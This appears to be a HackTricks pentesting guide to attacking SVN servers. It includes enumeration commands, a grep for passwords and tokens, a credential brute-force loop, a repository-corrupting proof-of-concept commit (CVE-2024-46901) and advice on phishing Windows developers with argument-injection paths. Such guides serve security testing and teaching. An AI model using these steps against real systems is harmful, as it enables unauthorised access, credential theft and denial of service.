3690/tcp - Pentesting Subversion (SVN) Server

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Subversion (SVN) is a centralized version control system (Apache license) used for software versioning and revision control.

Default port: 3690/tcp (svnserve). It can also be exposed via HTTP/HTTPS through mod_dav_svn and via svn+ssh.

PORT     STATE SERVICE
3690/tcp open  svnserve Subversion

nc -vn 10.10.10.10 3690
svnserve --version           # if shell access is obtained
svn --version                # client version leak via error messages

Enumeration

# Anonymous / authenticated listing
svn ls svn://10.10.10.203                  # list root
svn ls -R svn://10.10.10.203/repo         # recursive list
svn info svn://10.10.10.203/repo          # repo metadata
svn log svn://10.10.10.203/repo           # commit history
svn checkout svn://10.10.10.203/repo      # checkout repository
svn up -r 2                               # move working copy to revision 2
svn diff -r 1:HEAD svn://10.10.10.203/repo   # view changes

# If served over HTTP(S)
svn ls https://10.10.10.10/svn/repo --username guest --password ''

# Extract revision props (often contain build creds, URLs, tokens)
svn propget --revprop -r HEAD svn:log svn://10.10.10.203/repo

Auth & Misconfig Hunting

  • svnserve.conf may allow anon-access = read (or even write). If you can list, try checkout to dump secrets, scripts, CI tokens.
  • Repositories frequently store build pipelines, deployment keys, and database credentials in versioned config files. Grep the working copy after checkout: grep -R "password\|secret\|token" -n ..
  • If svn+ssh is enabled, user shells often allow restricted svnserve commands; attempt ssh user@host svnserve -t with crafted subcommands to bypass wrappers.

Bruteforcing credentials (svnserve)

sasl authentication (if enabled) and simple password files are protected only by the transport; no lockout by default. A quick Bash loop can try credentials:

for u in admin dev ci; do
  for p in $(cat /tmp/passlist); do
    svn ls --username "$u" --password "$p" svn://10.10.10.203/repo 2>/dev/null && echo "[+] $u:$p" && break
  done
done

Recent Vulnerabilities (practical impact)

mod_dav_svn DoS via control characters (CVE-2024-46901)

  • A user with commit rights can write a path containing control chars (e.g. \x01, \x7f) that corrupts the repository, making later checkouts/logs fail and potentially crashing mod_dav_svn workers.
  • Affects Subversion ≤ 1.14.4 when served through HTTP(S) (mod_dav_svn). Fixed in 1.14.5.
  • PoC commit with svnmucc (requires valid commit creds):
# create payload file
printf 'pwn' > /tmp/payload
# commit a path with a control character in its name
svnmucc -m "DoS" put /tmp/payload $'http://10.10.10.10/svn/repo/trunk/bad\x01path.txt'
  • After the commit, normal clients may crash or refuse updates until admins manually remove the revision with svnadmin dump/filter/load.

Windows argument injection in svn client (CVE-2024-45720)

  • On Windows, “best-fit” character encoding in svn.exe allows command-line argument injection when processing specially crafted non‑ASCII paths/URLs, potentially leading to arbitrary program execution.
  • Affects Subversion ≤ 1.14.3 on Windows only; fixed in 1.14.4. Attack surface: phishing a developer to run svn on an attacker-controlled URL/path.
  • Pentest angle: if you control a network share or ZIP given to a Windows dev, name a repo URL or working-copy path containing best-fit bytes that decode into " & calc.exe & "-style injected args, then trick the victim to run svn status or similar on that path.

Notes for Exploitation Workflow

  1. Check access method: svn:// (svnserve), http(s)://.../svn/ (mod_dav_svn), or svn+ssh://.
  2. Try anonymous read first; then spray common creds. If HTTP Basic is used, reuse creds found elsewhere.
  3. Enumerate hooks: hooks/pre-commit, post-commit scripts sometimes contain plaintext credentials or hostnames.
  4. Leverage svn:externals to pull additional paths from other hosts; list them with svn propget svn:externals -R . after checkout.
  5. Version leaks: HTTP response headers from mod_dav_svn usually show the Subversion & Apache version; compare against 1.14.5 to spot vuln targets.
  6. If you obtain filesystem access to the repo, svnadmin dump/svnlook author/svnlook dirs-changed allow offline analysis without credentials.

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks